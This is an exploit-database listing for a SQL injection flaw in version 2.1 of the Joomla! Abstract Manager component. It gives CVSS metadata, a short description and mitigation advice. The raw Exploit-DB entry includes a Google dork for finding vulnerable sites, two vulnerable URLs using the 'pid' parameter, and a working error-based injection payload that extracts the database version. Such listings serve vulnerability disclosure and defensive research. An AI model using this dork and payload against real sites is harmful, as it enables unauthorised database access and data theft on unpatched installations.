header-logo
Suggest Exploit
vendor:
Abstract Manager
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Abstract Manager
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla6teen:abstract_manager:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component Abstract v2.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Abstract v2.1. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to bypass authentication and gain access to unauthorized data. The vulnerable parameters are 'option' and 'view' in the URL. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL queries to the vulnerable application. The malicious SQL query can be used to bypass authentication and gain access to unauthorized data.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_abstract
# Date: 02.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
# Demo: http://demo.joomla6teen.com/abstractmanager
# Version: 2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
# 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
# # # # #

Navigation

Suggest Exploit

Services By CQR